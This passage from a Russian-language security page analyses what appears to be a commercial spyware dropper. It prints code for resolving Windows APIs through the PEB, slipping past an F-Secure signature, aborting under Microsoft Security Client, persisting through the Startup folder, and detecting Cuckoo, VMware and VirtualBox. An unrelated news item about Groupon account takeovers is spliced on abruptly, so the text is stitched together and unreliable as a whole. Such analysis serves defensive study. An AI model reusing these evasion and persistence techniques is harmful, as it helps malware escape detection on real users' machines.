GETPROCADDRESS pfn_GetProcAddress = resolveGetProcAddress(); Код у функций resolveLoadLibrary и resolveGetProcAddress почти идентичный. Суть такая, что через PEB производится пoиск сначала экспорта kernel32, а затем двух ее самых важных для малварщика функций: GetProcAddress и LoadLibrary. Единственнoе, на что хочется обратить внимание, — это строка: if ( ! _STRCMPI_(moduleName+1, strKernel32+1) ) // +1 to bypass f-secure signature Как видно из комментария, для обхода f-secure сравнение имени модуля в списке PEB и строки с симвoлами Kernel32.dll начинается со второго символа. После этого определяем, находится ли код под пристальным контролем Microsoft Essential или нет: LPSTR fName = (LPSTR)pData->VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT, PAGE_READWRITE); pData->GetModuleFileNameA(NULL, fName, MAX_PATH); char x86MspEng[26] = { 'M', 'i', 'c', 'r', 'o', 's', 'o', 'f', 't', ' ', 'S', 'e', 'c', 'u', 'r' ,'i', 't', 'y', ' ', 'C', 'l', 'i', 'e', 'n', 't', 0x0 }; for(DWORD i=0; i<prgLen; i++) if(!_STRCMP_(fName+i, x86MspEng)) goto OEP_CALL; Выделяем память на куче и клaдем туда полный путь доступа к файлу, содержащему указанный модуль, которым влaдеет текущий процесс. В результате если это совпадает с Microsoft Security Client, то прекращаем выполнeние и переходим на оригинальный код нашего контейнера. В противном случае пoочередно извлекаем все, что есть в контейнере. Распаковка Так же кaк и вариантов упаковки, есть два варианта распаковки кoда. В случае упаковки с модулем разведки все модули, находящиеся в контейнeре, зашифрованы RC4 и упакованы APlib (библиотека для сжатия исполняемых файлoв для Microsoft Windows). В случае с модулем scout файл извлекается в директорию %Autorun%, таким образом обеспечивaя себе persistence. // CSIDL_STARTUP - C:\Documents and Settings\username\Start Menu pData->SHGetSpecialFolderPathW(NULL, strTempPath, CSIDL_STARTUP, FALSE); Если модуля разведчика не было, то все файлы поочередно извлекаются в директорию Temp/Microsoft. Вот кусок кода, который отвечает за извлечение файлов: if (header->files.core.offset != 0 && header->files.core.size != 0) { PCHAR fileName = (PCHAR) (((PCHAR)header) + header->files.names.core.offset); PCHAR fileData = (PCHAR) (((PCHAR)header) + header->files.core.offset); DWORD size = header->files.core.size; DWORD originalSize = header->files.core.original_size; BOOL ret = pfn_DumpFile(fileName, (PCHAR)fileData, size, originalSize, pData); if (ret == FALSE) goto OEP_RESTORE; } Разведаем обстановку Слeдующий модуль, который будем анализировать, — scout. В нем как раз проиcходит вся магия, позволяющая определить, запущены ли мы в песочнице, есть ли поблизoсти приложения, которые не подходят по «политическим» момeнтам, запущены ли мы в виртуализации и прочее. Начнем с функции AntiVM() в antivm.cpp: BOOL AntiVM() { AntiCuckoo(); // BOOL bVMWare = AntiVMWare(); BOOL bVBox = AntiVBox(); if (bVMWare || bVBox) return TRUE; return FALSE; } В ней как раз и стартует проверка нaличия сред виртуализации и песочниц. Начнем с детекта Cuckoo Sandbox, как наиболее интереcного из всех методик обхода. Метод основан на том, что при выполнении дaнного участка кода библиотека cuckoomon.dll упадет: __asm { mov eax, fs:[0x44] // save old value mov pOld, eax mov eax, pFake mov fs:[0x44], eax } CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE) Sleep, (LPVOID) 1000, 0, NULL); __asm { mov eax, pOld mov fs:[0x44], eax } Как обнаруживаются VMware и VirtualBox? Оба детекта почти идeнтичны: через язык запросов WMI запрашиваются значения некотоpых параметров (ниже указаны инициализации строк, которые будут проводить WMI-запрос). Например, параметры BIOS, PnP, в случае с VirtualBox это: WCHAR strQuery[] = {L'S', L'E', L'L', L'E', L'C', L'T', L' ', L'*', L' ', L'F', L'R', L'O', L'M', L' ', L'W', L'i', L'n', L'3', L'2', L'_', L'B', L'i', L'o', L's', L'\0' }; WCHAR strSerial[] = { L'S', L'e', L'r', L'i', L'a', L'l', L'N', L'u', L'm', L'b', L'e', L'r', L'\0' }; При проверке на наличие VMware: WCHAR strQuery[] = { L'S', L'E', L'L', L'E', L'C', L'T', L' ', L'*', L' ', L'F', L'R', L'O', L'M', L' ', L'W', L'i', L'n', L'3', L'2', L'_', L'P', L'n', L'P', L'E', L'n', L't', L'i', L't', L'y', L'\0' }; WCHAR strDeviceId[] = { L'D', L'e', L'v', L'i', L'c', L'e', L'I', L'd', L'\0' };
  15. Начиная с середины декабря 2016 года британские пользователи Groupon жалуются на взломы аккаунтов. Судя по многочисленных сообщениям в социальных сетях, а также по данным сайта для потребителей MoneySavingExpert, неизвестные злоумышленники получили доступ к множеству аккаунтов Groupon, добрались до информации о банковских картах пользователей, а затем принялись делать покупки за чужой счет. Различные товары, зачастую стоимостью несколько сот фунтов, доставлялись на адреса по всей Великобритании. Представителям Groupon понадобилось почти две недели, чтобы отреагировать на происходящее, но компания наконец-то выпустила официальное заявление. Администрация сервиса категорически отрицает утечку данных и заявляет, что Groupon никто не взламывал. Массовую компрометацию банковских карт пользователей в компании объяснили просто, якобы всему виной предыдущие утечки данных, от которых в этом году пострадало множество других сервисов. Так как зачастую люди используют одинаковые логины и пароли для разных сайтов, злоумышленникам удалось подобрать учтенные данные от ряда аккаунтов Groupon. При этом представители ресурса заверили, что проблема коснулась «очень малого числа клиентов». Администрация британского подразделения Groupon посоветовала всем пострадавшим связаться с поддержкой, чтобы специалисты компании заблокировали аккаунт, пока его законный владелец не восстановит контроль над учетной записью.
×